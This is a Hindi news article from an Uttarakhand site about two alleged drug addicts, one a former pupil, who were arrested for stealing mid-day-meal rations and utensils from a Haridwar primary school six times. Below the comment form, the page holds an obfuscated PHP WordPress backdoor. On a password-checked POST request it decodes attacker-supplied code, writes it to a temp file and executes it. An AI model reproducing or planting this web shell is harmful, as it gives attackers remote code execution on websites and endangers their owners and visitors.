Uttarakhand: नशे की लत पूरी करने के लिए दो साल में एक ही स्कूल में की छह बार चोरी, पहले यहीं पढ़ता था आरोपी

Uttarakhand Press 27 June 2023: Haridwar News- कनखल थाना क्षेत्र के जियापोता गांव में सरकारी प्राइमरी स्कूल में बार-बार चोरी की घटनाओं को अंजाम देने वाला इसी स्कूल का एक पूर्व छात्र निकला। नशे की लत पूरी करने के लिए पूर्व छात्र और उसका एक दोस्त दो साल के भीतर छह बार चोरी कर चुके थे। पुलिस ने उनके कब्जे से मिड डे मील का राशन रसोई के बर्तन और अन्य सामान बरामद किया है। एसएसपी अजय सिंह ने पुलिस टीम को शाबाशी दी है।

कनखल क्षेत्र में जियापोता गांव के प्राथमिक विद्यालय में पिछले दो साल में छह बार चोरी हो चुकी थी, जिनमें तीन घटनाएं तो करीब डेढ़ माह के भीतर हुई। बीते 21 जून को फिर से स्कूल में चोरी की वारदात को अंजाम दिया गया। रसोई और कमरे की दीवार तोड़कर मिड डे मील की खाद्य सामग्री से लेकर बर्तन व कॉपी-किताबें तक चोरी कर ली गई। प्रधानाध्यापक परमवीर सिंह की शिकायत पर पुलिस ने मुकदमा दर्ज किया था।

सीओ सिटी जूही मनराल ने बताया कि थानाध्यक्ष नितेश शर्मा के नेतृत्व में एक पुलिस टीम ने चोर की खोजबीन के लिए सर्विलांस और मुखबिर तंत्र की मदद ली। इस बीच मुखबिर से पुलिस को पता चला कि दो युवक आसपास के गांवों में चावल बेचने की फिराक में है। जाल बिछाकर आरोपित नौशाद और सूरज निवासी जियापोता को पुलिस ने गिरफ्तार कर लिया।

पूछताछ में पता चला कि आरोपित नौशाद कक्षा दो तक इसी स्कूल में पढ़ा था और स्कूल के आने-जाने, खुलने-बंद होने के समय के बारे में अच्छी जानकारी रखता था। दोनों ही आरोपित नशे के आदी है और अपने खर्चे के लिए चोरियां करते थे। पुलिस टीम में थानाध्यक्ष नितेश शर्मा, जगजीतपुर चौकी प्रभारी देवेंद्र तोमर, उपनिरीक्षक उपेंद्र कुमार, कांस्टेबल सत्येंद्र रावत, बलवंत सिंह, कुलदीप, प्रलव चौहान व गजे सिंह शामिल रहे।

Read Previous

10 रुपये के विवाद में युवक ने तमंचा से उड़ा दी दुकानदार की खोपड़ी, हकीकत सुन पुलिस भी रह गई सन्न

Read Next

Uttarakhand: दर्दनाक हादसा, अनियंत्रित होकर खाई में गिरी कार, दो लोगों की मौत, चालक घायल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}